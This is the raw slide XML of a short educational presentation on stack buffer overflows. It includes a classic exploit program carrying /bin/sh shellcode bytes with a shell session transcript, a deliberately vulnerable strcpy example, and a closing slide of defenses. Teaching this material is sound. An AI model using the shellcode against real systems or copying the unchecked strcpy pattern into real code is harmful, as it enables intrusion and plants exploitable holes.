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Collin Donaldson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Overflow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32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buffer is a contiguous allocated chunk of memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, such as pointers, arrays, lists, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Languages like C and C++ do not feature automatic bounds checking  on the buffer, so it can be bypassed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The result of this bypass causes the buffer to “overflow”, so data such as the Return Address get jumbled, causing problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are also heap overflows, but they are rare so we shall focus on stacks.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064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program is executed (Linux)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24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2230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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[] = "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>""\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>""\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[128]; void main() { </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer[96]; </a:t>
            </a:r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; long </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>long_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = (long *) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>large_string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32; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>++) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>long_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) buffer; for 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err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>++) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>large_string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/>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode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]; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buffer,large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>[aleph1]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -o exploit1 exploit1.c </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>aleph1]$ ./exploit1 $ exit </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>exit [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>aleph1]$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486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4800600" cy="68580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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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  <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // theoretically reserve 5 byte of buffer plus the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       // terminating NULL....should allocate 8 bytes = 2 double </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>words</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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       // to overflow, need more than 8 bytes...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       // so, if more than 8 characters input by user,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       // there will be access violation, segmentation fault etc.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       char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[5];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       // a prompt how to execute the program...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       if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; 2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>             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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() NOT executed....\n");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("Syntax: %s &lt;characters&gt;\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0]);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>              exit(0);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// copy the user input to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, without any bound checking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     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  // a secure version is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>srtcpy_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      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mybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> content= %s\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r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       // you may want to try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()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      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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() executed...\n");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}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Clearer Example (C)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151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 a language that does bounds checking (i.e. Java)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secure code: Buffer overflows are the result of stuffing more code into a buffer than it is meant to hold. C library functions such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> () and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> () operate on null terminated strings and perform no bounds checking. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Invalidate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the stack to execute any instructions. Any code that attempts to execute any other code residing in the stack will cause a segmentation violation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic run-time checks: In this scheme, an application has restricted access in order to prevent attacks. This method primarily relies on the safety code being preloaded before an application is executed. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compiler Tools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40949"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld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163</TotalTime>
  <Words>344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Composite</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Definition</vt:lpstr>
      <vt:lpstr>How a program is executed (Linux)</vt:lpstr>
      <vt:lpstr>Example (C)</vt:lpstr>
      <vt:lpstr>Clearer Example (C)</vt:lpstr>
      <vt:lpstr>Defenses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Overflow</dc:title>
  <dc:creator>Collin</dc:creator>
  <cp:lastModifiedBy>Collin</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-02-10T02:40:55Z</dcterms:modified>
</cp:coreProperties>
</file>